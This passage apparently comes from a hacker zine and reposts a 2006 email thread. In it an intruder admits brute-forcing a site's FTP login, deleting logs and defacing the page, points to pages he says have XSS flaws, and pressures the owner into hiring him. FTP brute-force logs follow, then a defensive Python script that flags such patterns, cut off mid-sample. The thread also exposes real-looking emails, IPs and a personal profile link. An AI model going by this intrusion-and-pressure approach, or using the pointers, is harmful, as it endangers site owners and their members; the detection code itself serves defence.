> > > > ways including an SQL Injection.
> > > >
> > > > In conclusion, show me the logs, or any kind of proof that
> > > > indicates I hacked your server. I am offering my allegiance to HELPING you.
> > > >
> > > > Don't refuse.
> > > >
> > >
> > >
> >
>
------=_Part_44066_13773717.1155245088400--
X-Gmail-Received: a973a627762b90f8f9bc8a2e096d3039a05d9e9b
Delivered-To: charade000@gmail.com
Received: by 10.70.63.4 with SMTP id l4cs115948wxa;
Sun, 20 Aug 2006 06:57:34 -0700 (PDT)
Received: by 10.67.89.5 with SMTP id r5mr2944991ugl;
Sun, 20 Aug 2006 06:57:33 -0700 (PDT)
Received: by 10.66.221.8 with HTTP; Sun, 20 Aug 2006 06:57:33 -0700 (PDT)
Message-ID: <9efd8e010608200657m3e79f2g5524b2c75cd314d6@mail.gmail.com>
Date: Sun, 20 Aug 2006 06:57:33 -0700
From: "JA Synergy" <jasynergy@gmail.com>
To: Charade <charade000@gmail.com>
Subject: Re: Reply to cease and descist
In-Reply-To: <42cb2150608101424k718fa5e6q7b5b45cbd104c891@mail.gmail.com>
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary="----=_Part_31339_21983036.1156082253761"
References: <42cb2150608100754r5a510412q247e3a7883ac4c6@mail.gmail.com>
<9efd8e010608100910v3cc997c3s80323ffbd9dd02c9@mail.gmail.com>
<42cb2150608101117s200efb08p90299900fa1c8af8@mail.gmail.com>
<9efd8e010608101402q1209b1dcqd6853ace2a7a61cd@mail.gmail.com>
<42cb2150608101424k718fa5e6q7b5b45cbd104c891@mail.gmail.com>
------=_Part_31339_21983036.1156082253761
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Hello Saeed,
Just writing to let you know that I am waiting for my admin to send me the
log. Do you still want it?
Regards,
Andrew
On 8/10/06, Charade <charade000@gmail.com> wrote:
>
> Thanks, appreciate it.
>
> On 8/10/06, JA Synergy <jasynergy@gmail.com> wrote:
> >
> > Thanks for your help. I will try to fix the problems that you suggest.
> > I will contact my server admin for the log.
> >
> >
> > On 8/10/06, Charade <charade000@gmail.com > wrote:
> > >
> > > Of course I wouldn't do it as a job, I'm doing this out of kindness to
> > > help you. I'm a hacker not a criminal. I don't have time to sit here and do
> > > Penetration tests on your server, but I will point out certain things.
> > >
> > > But, if you needed someone to hire to administrate your servers, or a
> > > "consultant" to spend his day running tests I'm more than happy, and you know
> > > where to find me.
> > >
> > > First of all, you have tons of directories vulnerable to cross site
> > > scripting
> > > especially in the display_map.php
> > > and demo/sendurl.php
> > >
> > > -clean up the coding on the /admin.php
> > > Fatal error: Call to undefined function: gettext() in
> > > /home/jaenergy/public_html/admin.php on line 26
> > > That's how I was able to find out your user name was jaenergy.
> > >
> > > And if I spent more time I'm sure I can find more..
> > >
> > > Just curious though because I thought the admin of the website was a
> > > girl
> > >
> > > http://profile.myspace.com/index.cfm?fuseaction=user.viewprofile&friendid=86281236
> > >
> > > is saying that is her website.
> > > And that she coded it herself, which is a lie because I noticed it
> > > used pagekits.
> > >
> > > And btw, can you send me the proof that shows me I was in the server
> > > Just curious.
> > >
> > >
> > >
> > > On 8/10/06, JA Synergy <jasynergy@gmail.com > wrote:
> > > >
> > > > Hello Saeed,
> > > >
> > > > Please explain what you can do to secure the site. Are you helping
> > > > as a hobby or as a job? Let's say if we are not looking in hiring, are you
> > > > going to continue hacking us?
> > > >
> > > > Andrew
> > > >
> > > > On 8/10/06, Charade <charade000@gmail.com > wrote:
> > > > >
> > > > > Dear Tillie,
> > > > >
> > > > > First of all I would like to make it clear that I never gained
> > > > > root to the server, nor had 300 attempts to penetrate your email system, I
> > > > > gained access through your FTP port which was vulnerable to Brutus because
> > > > > of the weak password. And as for the search, I'm not impressed, you have me
> > > > > on your myspace and could have *easily* got the information from there, and
> > > > > I could do the same.
> > > > >
> > > > >
> > > > > I'd also like to inform you that when I did have root (in the
> > > > > FTP that is), I had the opportunity to cause catastrophic damage, I could
> > > > > have easily accessed the bank accounts of your members, and yours as well,
> > > > > You should be thanking me that my ethics were against this, and in
> > > > > replacement the only damage I did was deleting the logs, and replacing the
> > > > > index.html
> > > > >
> > > > > I won't pursue damage to hack your site, so you can be rest
> > > > > assured on this. But, I am offering my services to assist you in securing
> > > > > your website, because I can at the moment deface it again, through many
> > > > > other ways including an SQL Injection.
> > > > >
> > > > > In conclusion, show me the logs, or any kind of proof that
> > > > > indicate I hacked your server. I am offering my allegiance to HELPING you.
> > > > >
> > > > > Don't refuse.
> > > > >
> > > >
> > > >
> > >
> >
>
------=_Part_31339_21983036.1156082253761--
X-Gmail-Received: 0f94927fbfea8d737544174db075ab7cf7e0da68
Delivered-To: charade000@gmail.com
Received: by 10.70.63.4 with SMTP id l4cs117488wxa;
Sun, 20 Aug 2006 07:35:16 -0700 (PDT)
Received: by 10.67.29.12 with SMTP id g12mr2983512ugj;
Sun, 20 Aug 2006 07:35:14 -0700 (PDT)
Received: by 10.66.221.8 with HTTP; Sun, 20 Aug 2006 07:35:14 -0700 (PDT)
Message-ID: <9efd8e010608200735t38db00c3t9c4f8289987d53b0@mail.gmail.com>
Date: Sun, 20 Aug 2006 07:35:14 -0700
From: "JA Synergy" <jasynergy@gmail.com>
To: Charade <charade000@gmail.com>
Subject: Re: Reply to cease and descist
In-Reply-To: <9efd8e010608200657m3e79f2g5524b2c75cd314d6@mail.gmail.com>
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="----=_Part_31591_5882422.1156084514345"
References: <42cb2150608100754r5a510412q247e3a7883ac4c6@mail.gmail.com>
<9efd8e010608100910v3cc997c3s80323ffbd9dd02c9@mail.gmail.com>
<42cb2150608101117s200efb08p90299900fa1c8af8@mail.gmail.com>
<9efd8e010608101402q1209b1dcqd6853ace2a7a61cd@mail.gmail.com>
<42cb2150608101424k718fa5e6q7b5b45cbd104c891@mail.gmail.com>
<9efd8e010608200657m3e79f2g5524b2c75cd314d6@mail.gmail.com>
------=_Part_31591_5882422.1156084514345
Content-Type: multipart/alternative;
boundary="----=_Part_31592_14515442.1156084514345"
------=_Part_31592_14515442.1156084514345
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
here you go
On 8/20/06, JA Synergy <jasynergy@gmail.com> wrote:
>
> Hello Saeed,
>
> Just writing to let you know that I am waiting for my admin to send me
> the log. Do you still want it?
>
> Regards,
>
> Andrew
>
>
> On 8/10/06, Charade <charade000@gmail.com> wrote:
> >
> > Thanks, appreciate it.
> >
> > On 8/10/06, JA Synergy <jasynergy@gmail.com > wrote:
> > >
> > > Thanks for your help. I will try to fix the problems that you
> > > suggest. I will contact my server admin for the log.
> > >
> > >
> > > On 8/10/06, Charade <charade000@gmail.com > wrote:
> > > >
> > > > Of course I wouldn't do it as a job, I'm doing this out of kindness
> > > > to help you. I'm a hacker not a criminal. I don't have time to sit here and
> > > > do Penetration tests on your server, but I will point out certain things.
> > > >
> > > > But, if you needed someone to hire to administrate your servers, or
> > > > a "consultant" to spend his day running tests I'm more than happy, and you
> > > > know where to find me.
> > > >
> > > > First of all, you have tons of directories vulnerable to cross site
> > > > scripting
> > > > especially in the display_map.php
> > > > and demo/sendurl.php
> > > >
> > > > -clean up the coding on the /admin.php
> > > > *Fatal error*: Call to undefined function: gettext() in
> > > > */home/jaenergy/public_html/admin.php* on line *26*
> > > > That's how I was able to find out your user name was jaenergy.
> > > >
> > > > And if I spent more time I'm sure I can find more..
> > > >
> > > > Just curious though because I thought the admin of the website was
> > > > a girl
> > > >
> > > > http://profile.myspace.com/index.cfm?fuseaction=user.viewprofile&friendid=86281236
> > > >
> > > > is saying that is her website.
> > > > And that she coded it herself, which is a lie because I noticed it
> > > > used pagekits.
> > > >
> > > > And btw, can you send me the proof that show me I was in the server
> > > > Just curious.
> > > >
> > > > *
> > > >
> > > >
> > > > On 8/10/06, JA Synergy <jasynergy@gmail.com > wrote:
> > > > >
> > > > > Hello Saeed,
> > > > >
> > > > > Please explain what you can do to secure the site. Are you
> > > > > helping as a hobby or as a job? Let's say if we are not looking in hiring,
> > > > > are you going to continue hacking us?
> > > > >
> > > > > Andrew
> > > > >
> > > > > On 8/10/06, Charade <charade000@gmail.com > wrote:
> > > > > >
> > > > > > Dear Tillie,
> > > > > >
> > > > > > First of all I would like to make it clear that I never gained
> > > > > > root to the server, nor had 300 attempts to penetrate your email system, I
> > > > > > gained access through your FTP port which was vulnerable to Brutus because
> > > > > > of the weak password. And as for the search, I'm not impressed, you have me
> > > > > > on your myspace and could have *easily* got the information from there, and
> > > > > > I could do the same.
> > > > > >
> > > > > >
> > > > > > I'd also like to inform you that when I did have root (in the
> > > > > > FTP that is), I had the opportunity to cause catastrophic damage, I could
> > > > > > have easily accessed the bank accounts of your members, and yours as well,
> > > > > > You should be thanking me that my ethics were against this, and in
> > > > > > replacement the only damage I did was deleting the logs, and replacing the
> > > > > > index.html
> > > > > >
> > > > > > I won't pursue damage to hack your site, so you can be rest
> > > > > > assured on this. But, I am offering my services to assist you in securing
> > > > > > your website, because I can at the moment deface it again, through many
> > > > > > other ways including an SQL Injection.
> > > > > >
> > > > > > In conclusion, show me the logs, or any kind of proof that
> > > > > > indicate I hacked your server. I am offering my allegiance to HELPING you.
> > > > > >
> > > > > > Don't refuse.
> > > > > >
> > > > >
> > > > >
> > > >
> > >
> >
>
------=_Part_31592_14515442.1156084514345--
------=_Part_31591_5882422.1156084514345
Content-Type: text/plain; name="ftphackattempts.txt"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="ftphackattempts.txt"
X-Attachment-Id: f_er3iu67a
------=_Part_31591_5882422.1156084514345--
X-Gmail-Received: 49fb2b55bfdea8238081a4c8cb3d13ef3ca70f3c
Received: by 10.70.63.4 with HTTP; Sun, 20 Aug 2006 11:45:16 -0700 (PDT)
Message-ID: <42cb2150608201145g2b62ae1ex6facd9900ef9c6da@mail.gmail.com>
Date: Sun, 20 Aug 2006 11:45:16 -0700
From: Charade <charade000@gmail.com>
To: "JA Synergy" <jasynergy@gmail.com>
Subject: Re: Reply to cease and descist
In-Reply-To: <9efd8e010608200657m3e79f2g5524b2c75cd314d6@mail.gmail.com>
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary="----=_Part_30080_17320577.1156099516421"
References: <42cb2150608100754r5a510412q247e3a7883ac4c6@mail.gmail.com>
<9efd8e010608100910v3cc997c3s80323ffbd9dd02c9@mail.gmail.com>
<42cb2150608101117s200efb08p90299900fa1c8af8@mail.gmail.com>
<9efd8e010608101402q1209b1dcqd6853ace2a7a61cd@mail.gmail.com>
<42cb2150608101424k718fa5e6q7b5b45cbd104c891@mail.gmail.com>
<9efd8e010608200657m3e79f2g5524b2c75cd314d6@mail.gmail.com>
Delivered-To: charade000@gmail.com
------=_Part_30080_17320577.1156099516421
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Yes, I'd still like to see the log. Hopefully you're not going through too much
trouble acquiring it.
On 8/20/06, JA Synergy <jasynergy@gmail.com> wrote:
>
> Hello Saeed,
>
> Just writing to let you know that I am waiting for my admin to send me
> the log. Do you still want it?
>
> Regards,
>
> Andrew
>
>
> On 8/10/06, Charade <charade000@gmail.com> wrote:
> >
> > Thanks, appreciate it.
> >
> > On 8/10/06, JA Synergy <jasynergy@gmail.com > wrote:
> > >
> > > Thanks for your help. I will try to fix the problems that you
> > > suggest. I will contact my server admin for the log.
> > >
> > >
> > > On 8/10/06, Charade <charade000@gmail.com > wrote:
> > > >
> > > > Of course I wouldn't do it as a job, I'm doing this out of kindness
> > > > to help you. I'm a hacker not a criminal. I don't have time to sit here and
> > > > do Penetration tests on your server, but I will point out certain things.
> > > >
> > > > But, if you needed someone to hire to administrate your servers, or
> > > > a "consultant" to spend his day running tests I'm more than happy, and you
> > > > know where to find me.
> > > >
> > > > First of all, you have tons of directories vulnerable to cross site
> > > > scripting
> > > > especially in the display_map.php
> > > > and demo/sendurl.php
> > > >
> > > > -clean up the coding on the /admin.php
> > > > *Fatal error*: Call to undefined function: gettext() in
> > > > */home/jaenergy/public_html/admin.php* on line *26*
> > > > That's how I was able to find out your user name was jaenergy.
> > > >
> > > > And if I spent more time I'm sure I can find more..
> > > >
> > > > Just curious though because I thought the admin of the website was
> > > > a girl
> > > >
> > > > http://profile.myspace.com/index.cfm?fuseaction=user.viewprofile&friendid=86281236
> > > >
> > > > is saying that is her website.
> > > > And that she coded it herself, which is a lie because I noticed it
> > > > used pagekits.
> > > >
> > > > And btw, can you send me the proof that show me I was in the server
> > > > Just curious.
> > > >
> > > > *
> > > >
> > > >
> > > > On 8/10/06, JA Synergy <jasynergy@gmail.com > wrote:
> > > > >
> > > > > Hello Saeed,
> > > > >
> > > > > Please explain what you can do to secure the site. Are you
> > > > > helping as a hobby or as a job? Let's say if we are not looking in hiring,
> > > > > are you going to continue hacking us?
> > > > >
> > > > > Andrew
> > > > >
> > > > > On 8/10/06, Charade <charade000@gmail.com > wrote:
> > > > > >
> > > > > > Dear Tillie,
> > > > > >
> > > > > > First of all I would like to make it clear that I never gained
> > > > > > root to the server, nor had 300 attempts to penetrate your email system, I
> > > > > > gained access through your FTP port which was vulnerable to Brutus because
> > > > > > of the weak password. And as for the search, I'm not impressed, you have me
> > > > > > on your myspace and could have *easily* got the information from there, and
> > > > > > I could do the same.
> > > > > >
> > > > > >
> > > > > > I'd also like to inform you that when I did have root (in the
> > > > > > FTP that is), I had the opportunity to cause catastrophic damage, I could
> > > > > > have easily accessed the bank accounts of your members, and yours as well,
> > > > > > You should be thanking me that my ethics were against this, and in
> > > > > > replacement the only damage I did was deleting the logs, and replacing the
> > > > > > index.html
> > > > > >
> > > > > > I won't pursue damage to hack your site, so you can be rest
> > > > > > assured on this. But, I am offering my services to assist you in securing
> > > > > > your website, because I can at the moment deface it again, through many
> > > > > > other ways including an SQL Injection.
> > > > > >
> > > > > > In conclusion, show me the logs, or any kind of proof that
> > > > > > indicate I hacked your server. I am offering my allegiance to HELPING you.
> > > > > >
> > > > > > Don't refuse.
> > > > > >
> > > > >
> > > > >
> > > >
> > >
> >
>
------=_Part_30080_17320577.1156099516421--
X-Gmail-Received: e9e9efa1fbcc78702bedaac5b808370c8417bc39
Delivered-To: charade000@gmail.com
Received: by 10.70.63.4 with SMTP id l4cs143803wxa;
Sun, 20 Aug 2006 20:15:51 -0700 (PDT)
Received: by 10.67.119.5 with SMTP id w5mr3314596ugm;
Sun, 20 Aug 2006 20:15:50 -0700 (PDT)
Received: by 10.66.221.8 with HTTP; Sun, 20 Aug 2006 20:15:50 -0700 (PDT)
Message-ID: <9efd8e010608202015w23c2fac5q8aa972ab3445b1f6@mail.gmail.com>
Date: Sun, 20 Aug 2006 22:15:50 -0500
From: "JA Synergy" <jasynergy@gmail.com>
To: Charade <charade000@gmail.com>
Subject: Re: Reply to cease and descist
In-Reply-To: <42cb2150608201145g2b62ae1ex6facd9900ef9c6da@mail.gmail.com>
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary="----=_Part_41690_10171641.1156130150838"
References: <42cb2150608100754r5a510412q247e3a7883ac4c6@mail.gmail.com>
<9efd8e010608100910v3cc997c3s80323ffbd9dd02c9@mail.gmail.com>
<42cb2150608101117s200efb08p90299900fa1c8af8@mail.gmail.com>
<9efd8e010608101402q1209b1dcqd6853ace2a7a61cd@mail.gmail.com>
<42cb2150608101424k718fa5e6q7b5b45cbd104c891@mail.gmail.com>
<9efd8e010608200657m3e79f2g5524b2c75cd314d6@mail.gmail.com>
<42cb2150608201145g2b62ae1ex6facd9900ef9c6da@mail.gmail.com>
------=_Part_41690_10171641.1156130150838
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
I sent it to you already, did u get it?
On 8/20/06, Charade <charade000@gmail.com> wrote:
>
> Yes, id still like to see the log. Hopefully your not going through too
> much trouble acquiring it.
>
>
> On 8/20/06, JA Synergy < jasynergy@gmail.com> wrote:
> >
> > Hello Saeed,
> >
> > Just writing to let you know that I am waiting for my admin the send me
> > the log. Do you still want it?
> >
> > Regards,
> >
> > Andrew
> >
> >
> > On 8/10/06, Charade <charade000@gmail.com > wrote:
> > >
> > > Thanks, appreciate it.
> > >
> > > On 8/10/06, JA Synergy <jasynergy@gmail.com > wrote:
> > > >
> > > > Thanks for your help. I will try to fix the problems that you
> > > > suggest. I will contact my server admin for the log.
> > > >
> > > >
> > > > On 8/10/06, Charade <charade000@gmail.com > wrote:
> > > > >
> > > > > Of course I wouldnt do it as a job, im doing this out of kindess
> > > > > to help you. Im a hacker not a criminal. I don't have time to sit here and
> > > > > do Penetration tests on your server, but i will point out certain things.
> > > > >
> > > > > But, if you needed someone to hire to administrate your servers,
> > > > > > or a "consultant" to spend his day running tests im more than happy, and
> > > > > > you know where to find me.
> > > > >
> > > > > First of all, you have tons of directories vulnerable to cross
> > > > > site scripting
> > > > > especially in the display_map.php
> > > > > and demo/sendurl.php
> > > > >
> > > > > -clean up the coding on the /admin.php
> > > > > *Fatal error*: Call to undefined function: gettext() in *
> > > > > /home/jaenergy/public_html/admin.php* on line *26
> > > > > Thats*:* how i was able to find out your user name was jaenergy.
> > > > >
> > > > > And if i spent more time im sure i can find more..
> > > > >
> > > > > Just curious though because i thought the admin of the website
> > > > > was a girl
> > > > >
http://profile.myspace.com/index.cfm?fuseaction=user.viewprofile&friendid=86281236
> > > > >
> > > > > is saying that is her website.
> > > > > And that she coded it herself, which is a lie because i noticed it
> > > > > used pagekits.
> > > > >
> > > > > And btw, can you send me the proof that show me i wa sin the
> > > > > server
> > > > > Just curious.
> > > > >
> > > > > *
> > > > >
> > > > >
> > > > > On 8/10/06, JA Synergy <jasynergy@gmail.com > wrote:
> > > > > >
> > > > > > Hello Saeed,
> > > > > >
> > > > > > Please explain what you can do to secure the site. Are you
> > > > > > > helping as a hobby or as a job? Let's say if we are not looking in
> > > > > > > hiring, are you going to continue hacking us?
> > > > > >
> > > > > > Andrew
> > > > > >
> > > > > > On 8/10/06, Charade <charade000@gmail.com > wrote:
> > > > > > >
> > > > > > > Dear Tillie,
> > > > > > >
> > > > > > > > First of all i would like to make it clear that i never gained
> > > > > > > > root to the server, nor had 300 attempts to penetrate your email
> > > > > > > > system, I gained access through your FTP port which was vulnerable
> > > > > > > > to Brutus because of the weak password. And as for the search, Im
> > > > > > > > not impressed, you have me on your myspace and could have *easily*
> > > > > > > > got the information from there, and i could do the same.
> > > > > > > >
> > > > > > > >
> > > > > > > > I'd also like to inform you that when i did have root( in
> > > > > > > > the FTP that is), I had the oppurtunity to cause catastrophic damage,
> > > > > > > > I could have easily accessed the bank accounts of your members, and
> > > > > > > > yours as well, You should be thanking me that my ethics were against
> > > > > > > > this, and in replacement the only damage i did was deleting the logs,
> > > > > > > > and replacing the index.html
> > > > > > > >
> > > > > > > > I wont pursue damage to hack your site, so you can be rest
> > > > > > > > assured on this. But, i am offering my services to assist you in
> > > > > > > > securing your website, because I can at the moment deface it again,
> > > > > > > > through many other ways including an SQL Injection.
> > > > > > > >
> > > > > > > > in Conclusion, show me the logs , or any kind of proof that
> > > > > > > > indicate i hacked your server. I am offering my allegiance to
> > > > > > > > HELPING you.
> > > > > > >
> > > > > > > Dont refuse.
> > > > > > >
> > > > > >
> > > > > >
> > > > >
> > > >
> > >
> >
>
------=_Part_41690_10171641.1156130150838--
X-Gmail-Received: 4c0c1d29ecf28ed3aabc749261a72ef96a2b83c0
Received: by 10.70.63.4 with HTTP; Mon, 21 Aug 2006 08:17:23 -0700 (PDT)
Message-ID: <42cb2150608210817y667277f1ma9d30904b8b5ac8f@mail.gmail.com>
Date: Mon, 21 Aug 2006 08:17:23 -0700
From: Charade <charade000@gmail.com>
To: "JA Synergy" <jasynergy@gmail.com>
Subject: Re: Reply to cease and descist
In-Reply-To: <9efd8e010608202015w23c2fac5q8aa972ab3445b1f6@mail.gmail.com>
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary="----=_Part_43329_30480888.1156173443704"
References: <42cb2150608100754r5a510412q247e3a7883ac4c6@mail.gmail.com>
<9efd8e010608100910v3cc997c3s80323ffbd9dd02c9@mail.gmail.com>
<42cb2150608101117s200efb08p90299900fa1c8af8@mail.gmail.com>
<9efd8e010608101402q1209b1dcqd6853ace2a7a61cd@mail.gmail.com>
<42cb2150608101424k718fa5e6q7b5b45cbd104c891@mail.gmail.com>
<9efd8e010608200657m3e79f2g5524b2c75cd314d6@mail.gmail.com>
<42cb2150608201145g2b62ae1ex6facd9900ef9c6da@mail.gmail.com>
<9efd8e010608202015w23c2fac5q8aa972ab3445b1f6@mail.gmail.com>
Delivered-To: charade000@gmail.com
------=_Part_43329_30480888.1156173443704
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Yea, thanks
On 8/20/06, JA Synergy <jasynergy@gmail.com> wrote:
>
> I sent it to you already, did u get it?
>
>
> On 8/20/06, Charade <charade000@gmail.com> wrote:
> >
> > Yes, id still like to see the log. Hopefully your not going through too
> > much trouble acquiring it.
> >
> >
> > On 8/20/06, JA Synergy < jasynergy@gmail.com > wrote:
> > >
> > > Hello Saeed,
> > >
> > > Just writing to let you know that I am waiting for my admin the send
> > > me the log. Do you still want it?
> > >
> > > Regards,
> > >
> > > Andrew
> > >
> > >
> > > On 8/10/06, Charade <charade000@gmail.com > wrote:
> > > >
> > > > Thanks, appreciate it.
> > > >
> > > > On 8/10/06, JA Synergy <jasynergy@gmail.com > wrote:
> > > > >
> > > > > Thanks for your help. I will try to fix the problems that you
> > > > > suggest. I will contact my server admin for the log.
> > > > >
> > > > >
> > > > > On 8/10/06, Charade <charade000@gmail.com > wrote:
> > > > > >
> > > > > > > Of course I wouldnt do it as a job, im doing this out of
> > > > > > > kindess to help you. Im a hacker not a criminal. I don't have time to
> > > > > > > sit here and do Penetration tests on your server, but i will point out
> > > > > > > certain things.
> > > > > >
> > > > > > But, if you needed someone to hire to administrate your
> > > > > > servers, or a "consultant" to spend his day running tests im more than
> > > > > > happy, and you know where to find me.
> > > > > >
> > > > > > First of all, you have tons of directories vulnerable to cross
> > > > > > site scripting
> > > > > > especially in the display_map.php
> > > > > > and demo/sendurl.php
> > > > > >
> > > > > > -clean up the coding on the /admin.php
> > > > > > *Fatal error*: Call to undefined function: gettext() in *
> > > > > > /home/jaenergy/public_html/admin.php* on line *26
> > > > > > Thats*:* how i was able to find out your user name was jaenergy.
> > > > > >
> > > > > > And if i spent more time im sure i can find more..
> > > > > >
> > > > > > Just curious though because i thought the admin of the website
> > > > > > was a girl
> > > > > >
http://profile.myspace.com/index.cfm?fuseaction=user.viewprofile&friendid=86281236
> > > > > >
> > > > > > is saying that is her website.
> > > > > > And that she coded it herself, which is a lie because i noticed
> > > > > > it used pagekits.
> > > > > >
> > > > > > And btw, can you send me the proof that show me i wa sin the
> > > > > > server
> > > > > > Just curious.
> > > > > >
> > > > > > *
> > > > > >
> > > > > >
> > > > > > On 8/10/06, JA Synergy <jasynergy@gmail.com > wrote:
> > > > > > >
> > > > > > > Hello Saeed,
> > > > > > >
> > > > > > > Please explain what you can do to secure the site. Are you
> > > > > > > > helping as a hobby or as a job? Let's say if we are not looking in
> > > > > > > > hiring, are you going to continue hacking us?
> > > > > > >
> > > > > > > Andrew
> > > > > > >
> > > > > > > On 8/10/06, Charade <charade000@gmail.com > wrote:
> > > > > > > >
> > > > > > > > Dear Tillie,
> > > > > > > >
> > > > > > > > > First of all i would like to make it clear that i never
> > > > > > > > > gained root to the server, nor had 300 attempts to penetrate your
> > > > > > > > > email system, I gained access through your FTP port which was
> > > > > > > > > vulnerable to Brutus because of the weak password. And as for the
> > > > > > > > > search, Im not impressed, you have me on your myspace and could have
> > > > > > > > > *easily* got the information from there, and i could do the same.
> > > > > > > > >
> > > > > > > > >
> > > > > > > > > I'd also like to inform you that when i did have root( in
> > > > > > > > > the FTP that is), I had the oppurtunity to cause catastrophic
> > > > > > > > > damage, I could have easily accessed the bank accounts of your
> > > > > > > > > members, and yours as well, You should be thanking me that my ethics
> > > > > > > > > were against this, and in replacement the only damage i did was
> > > > > > > > > deleting the logs, and replacing the index.html
> > > > > > > > >
> > > > > > > > > I wont pursue damage to hack your site, so you can be rest
> > > > > > > > > assured on this. But, i am offering my services to assist you in
> > > > > > > > > securing your website, because I can at the moment deface it again,
> > > > > > > > > through many other ways including an SQL Injection.
> > > > > > > > >
> > > > > > > > > in Conclusion, show me the logs , or any kind of proof that
> > > > > > > > > indicate i hacked your server. I am offering my allegiance to
> > > > > > > > > HELPING you.
> > > > > > > >
> > > > > > > > Dont refuse.
> > > > > > > >
> > > > > > >
> > > > > > >
> > > > > >
> > > > >
> > > >
> > >
> >
>
------=_Part_43329_30480888.1156173443704--
[penguin]$ cat bruteforce-ftp-logs.txt
Aug 8 15:20:49 alpha proftpd[3922]: alpha.alphared.com (75.22.72.48[75.22.72.48]) -
USER admin: no such user found from 75.22.72.48 [75.22.72.48] to 64.72.127.199:21
Aug 8 15:21:15 alpha proftpd[4028]: alpha.alphared.com (75.22.72.48[75.22.72.48]) -
USER anonymous: no such user found from 75.22.72.48 [75.22.72.48] to
64.72.127.199:21
Aug 8 18:00:42 alpha proftpd[08067]: alpha.alphared.com (75.22.72.48[75.22.72.48])
- USER admin: no such user found from 75.22.72.48 [75.22.72.48] to 64.72.127.199:21
Aug 8 18:00:42 alpha proftpd[08062]: alpha.alphared.com (75.22.72.48[75.22.72.48])
- USER admin: no such user found from 75.22.72.48 [75.22.72.48] to 64.72.127.199:21
Aug 8 18:00:42 alpha proftpd[08064]: alpha.alphared.com (75.22.72.48[75.22.72.48])
- USER admin: no such user found from 75.22.72.48 [75.22.72.48] to 64.72.127.199:21
Aug 8 18:00:42 alpha proftpd[08063]: alpha.alphared.com (75.22.72.48[75.22.72.48])
- USER admin: no such user found from 75.22.72.48 [75.22.72.48] to 64.72.127.199:21
Aug 8 18:00:42 alpha proftpd[08068]: alpha.alphared.com (75.22.72.48[75.22.72.48])
- USER admin: no such user found from 75.22.72.48 [75.22.72.48] to 64.72.127.199:21
(.....)
Aug 8 19:53:59 alpha proftpd[14208]: alpha.alphared.com (75.22.72.48[75.22.72.48])
- USER jaenergy: Login successful.
Aug 8 20:12:23 alpha proftpd[14171]: alpha.alphared.com (75.22.72.48[75.22.72.48])
- USER jaenergy: Login successful.
Wow, that's pretty leet, bruteforcing FTP logins.
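Added example, not part of the original zine: from the server side, the log excerpt above is a run of failed USER attempts from one address followed much later by a successful login from that same address. The Python below flags that pattern in proftpd-style lines. The sample log, addresses, hostnames, account names and thresholds are constructed for illustration, one log entry per line is assumed, and the "(Login failed): Incorrect password." message form is an assumption not shown on the page.

```python
import re
from collections import defaultdict, namedtuple
from datetime import datetime, timedelta

Event = namedtuple("Event", "ts ip user outcome")

# Matches the line shape shown in the excerpt:
#   <Mon> <day> <time> <host> proftpd[<pid>]: <fqdn> (<rdns>[<ip>]) - USER <name>: <message>
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+\s+\d\d:\d\d:\d\d)\s+\S+\s+proftpd\[\d+\]:\s+\S+\s+"
    r"\([^\[\]]*\[(?P<ip>[^\]]+)\]\)\s+-\s+"
    r"USER\s+(?P<user>[^\s:]+)(?:\s+\(Login failed\))?:\s+(?P<msg>.*)$"
)


def parse_line(line, year=2006):
    """Return an Event for a login attempt, or None for any other line."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    # Syslog timestamps carry no year, so the caller supplies one.
    stamp = " ".join(m.group("ts").split())
    ts = datetime.strptime("%d %s" % (year, stamp), "%Y %b %d %H:%M:%S")
    msg = m.group("msg").lower()
    if msg.startswith("login successful"):
        outcome = "success"
    elif msg.startswith("no such user") or msg.startswith("incorrect password"):
        outcome = "failure"
    else:
        return None
    return Event(ts, m.group("ip"), m.group("user"), outcome)


def detect(lines, year=2006, threshold=5,
           window=timedelta(minutes=10), lookback=timedelta(hours=6)):
    """Return alerts as (kind, ip, user, failure_count) tuples.

    failure_burst          : >= threshold failures from one IP inside `window`
    success_after_failures : a successful login from an IP that produced
                             >= threshold failures during the preceding `lookback`
    """
    events = sorted((e for e in (parse_line(l, year) for l in lines) if e),
                    key=lambda e: e.ts)
    failures = defaultdict(list)   # ip -> timestamps of failed attempts
    burst_reported = set()         # report each noisy IP once
    alerts = []
    for ev in events:
        if ev.outcome == "failure":
            failures[ev.ip].append(ev.ts)
            recent = [t for t in failures[ev.ip] if ev.ts - t <= window]
            if len(recent) >= threshold and ev.ip not in burst_reported:
                burst_reported.add(ev.ip)
                alerts.append(("failure_burst", ev.ip, None, len(recent)))
        else:
            # The lookback is long on purpose: guessing can stop well before
            # the working password is finally used.
            prior = [t for t in failures[ev.ip] if ev.ts - t <= lookback]
            if len(prior) >= threshold:
                alerts.append(("success_after_failures", ev.ip, ev.user, len(prior)))
    return alerts


# Constructed sample (documentation address ranges, made-up account names).
SAMPLE_LOG = """\
Aug  8 18:00:40 ftp1 proftpd[8061]: ftp1.example.net (203.0.113.7[203.0.113.7]) - USER admin: no such user found from 203.0.113.7 [203.0.113.7] to 192.0.2.10:21
Aug  8 18:00:42 ftp1 proftpd[8062]: ftp1.example.net (203.0.113.7[203.0.113.7]) - USER admin: no such user found from 203.0.113.7 [203.0.113.7] to 192.0.2.10:21
Aug  8 18:00:42 ftp1 proftpd[8063]: ftp1.example.net (203.0.113.7[203.0.113.7]) - USER root: no such user found from 203.0.113.7 [203.0.113.7] to 192.0.2.10:21
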